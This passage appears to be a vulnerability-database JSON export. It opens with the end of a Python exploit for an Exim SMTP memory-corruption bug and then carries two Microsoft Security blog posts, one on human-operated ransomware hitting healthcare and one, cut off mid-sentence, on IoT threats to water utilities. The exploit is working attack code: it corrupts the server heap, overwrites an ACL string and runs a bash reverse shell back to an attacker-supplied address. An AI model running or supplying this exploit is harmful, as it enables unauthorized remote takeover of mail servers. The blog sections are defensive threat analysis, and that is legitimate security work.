with 0x6060 block space\"\n\n unrec(\"\\xff\" * 2000)\n\n ehlo(\"D\" * 8200)\n\n one_byte_overwrite()\n\n print \"[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1\"\n\n fake_header = p(0) \n fake_header += p(0x1f51)\n auth_plain(\"E\" * 176 + fake_header + \"E\" * (8200-176-len(fake_header)))\n\n print \"[3] patched following store block with fake header so extended chunk can be freed\"\n\n ehlo(\"F\" * 16)\n\n print \"[4] freed extended store block\"\n\n unrec(\"\\xff\" * 2000) #filler against freed block\n \n unrec(\"\\xff\" * 2000) #filler against freed block\n\n fake_header = p(0x4110)\n fake_header += p(0x1f50) \n auth_plain(\"G\" * 176 + fake_header + \"G\" * (8200-176-len(fake_header)))\n\n print \"[5] patched store block with fake header so extended chunk can be malloced\"\n\n #acl_store_block_partial_address = \"\\x80\\xa4\\x6e\"\n acl_store_block_partial_address = \"\\xe0\\xc8\\x6c\"\n \n auth_plain(\"H\" * 8200 + p(0x2021) + acl_store_block_partial_address, \"X\")\n \n print \"[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address\"\n\n ehlo(\"I\" * 16)\n\n print \"[7] triggered smtp_reset_3(); with EHLO\"\n\n # 288 is for github build\n # 1000 is for debian build\n #acl_smtp_rcpt_offset = 288\n acl_smtp_rcpt_offset = 1000-16\n\n cmd = \"/bin/bash -c \\\"/bin/bash -i >& /dev/tcp/\" + local_address + \"/\" + str(local_port) + \" 0>&1\\\"\"\n cmd_expansion_string = \"${run{\" + cmd + \"}}\\0\"\n\n auth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"\\0\" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \n\n print \"[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression\"\n\n write(\"MAIL FROM:<[email\u00a0protected]>\") ; readuntil()\n\n write(\"RCPT TO:<[email\u00a0protected]>\") \n\n print \"[9] triggered RCPT TO which executes shell expression ... enjoy your shell!\"\n\n print\n\nif __name__ == '__main__':\n logo()\n if len(sys.argv) < 5:\n print \"Usage: ./exploit <remote_address> <remote_port> <local_address> <local_port>\\n\"\n exit()\n remote_address = sys.argv[1]\n remote_port = int(sys.argv[2])\n local_address = sys.argv[3]\n local_port = int(sys.argv[4])\n #print remote_address, remote_port, local_address, local_port\n exploit(remote_address, remote_port, local_address, local_port)\n", "sourceHref": "https://0day.today/exploit/36350", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n![diagram showing different attack stages and techniques in each stage that various ransomware groups use](https://www.microsoft.com/security/blog/wp-content/uploads/2020/04/human-operated-ransomware-payloads-blog-4.png)\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T20:03:10", "description": "South Staffordshire PLC, a company that supplies water to over one million customers in the United Kingdom, [notified](<https://www.south-staffs-water.co.uk/news/important-statement>) its customers in August of being a target of a criminal cyberattack. This incident highlights the sophisticated threats that critical industries face today. According to South Staffordshire, the breach did not appear to have caused damage to the systems and it did not impact their ability to supply safe water to their customers.\n\nThe attack brings to light the risk of threat actors gaining access to industrial control system (ICS) environments. According to [reports](<https://www.itpro.co.uk/security/ransomware/368808/uk-water-supplier-confirms-hack-by-cl0p-ransomware-gang>), a group associated with the Cl0p ransomware claimed responsibility for the attack, which followed a familiar [extortion model](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0537>) wherein attackers extort the target for exfiltrated data without encrypting the organization\u2019s files. After the attack, confidential documents, along with screenshots of the supervisory control and data acquisition (SCADA) system used by water treatment plants were leaked.\n\nAs details of the attack and the vector used to access South Staffordshire PLC\u2019s networks are limited, the Microsoft Defender for IoT research team did further research on techniques used by threat actors in similar attacks. Microsoft researchers have previously observed activity relating to [internet-exposed IoT devices](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) across different industries, which may be used as a potential foothold into OT networks. Threat actors gain access by deploying malware on information technology (IT) devices and then crossing the boundary to the operational technology (OT) part of the network to target high-value operational assets, or by compromising unmanaged, usually less secure IoT and OT devices.\n\n## IoT devices in critical infrastructure networks\n\nIoT devices offer significant value to organizations and extend beyond environmental monitoring sensors to common office equipment and network devices. However, IoT devices in critical infrastructure networks, if not properly secured, increase the risk of unauthorized access to operational assets and networks. Improper configurations such as default credentials and unpatched vulnerabilities are often abused by threat actors to gain network or device access. Once access is established, attackers could identify other assets on the same network, perform reconnaissance, and plan large-scale attacks on sensitive equipment and devices.\n\nIn monitoring threats against critical infrastructure and utilities, Microsoft researchers investigated water utility providers in the United Kingdom with exposed IoT devices within their networks. Using open-source intelligence (OSINT) and Microsoft Defender Threat Intelligence data, the team searched for exposed IoT devices integrated into the networks of water utility providers and found that such facilities were using Draytek Vigor routers, which are intended for home use.\n\n![Map showing global distribution of Draytek Vigor devices exposed to the Internet ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Fig-1-global-mapping-of-internet-exposed-draytek-vigor-devices.png)Figure 1. Global mapping of internet-exposed Draytek Vigor devices\n\nWith difficult-to-patch devices such as printers, cameras, routers, and gateway devices overlooked as potential footholds into networks, they are often left exposed. In analyzing Microsoft threat intelligence, Microsoft researchers observed threat actors abusing a known remote code execution vulnerability in Draytek Vigor devices ([CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>)) to deploy the Mirai botnet. Once attackers establish device access, remote code execution vulnerabilities such as CVE-2020-8515 can then allow attackers to run malicious commands on devices, move laterally within the network, and access other vulnerable devices which were not directly exposed to the internet such as SCADA systems. \n\nIn water treatment applications, SCADA systems allow water plants to monitor levels of specific chemicals and toxins and to collect records of the systems. While the attack against South Staffordshire PLC does not appear to have included the abuse of these devices, the release of files pertaining to OT systems constitutes a high-risk to operations and highlights the importance of network segmentation to protect devices and networks from lateral movement.\n\n## Defending critical networks\n\nAttacks on utility providers\u2019 OT networks and devices are high-risk events that can range from data theft to the manipulation of devices controlling the operations. Such events can lead to the interruption of operations, or in severe cases, potential harm to individuals and customers (For example, when [hackers gained access to the water system of one Florida city](<https://www.bbc.com/news/world-us-canada-55989843>) as reported in February 2021).\n\nGiven the severity of these attacks and their potential impact on the utility providers\u2019 operations and even the safety of their customers, it becomes crucial to recognize the importance of proper security practices around IoT & OT unmanaged devices to ensure that such attacks d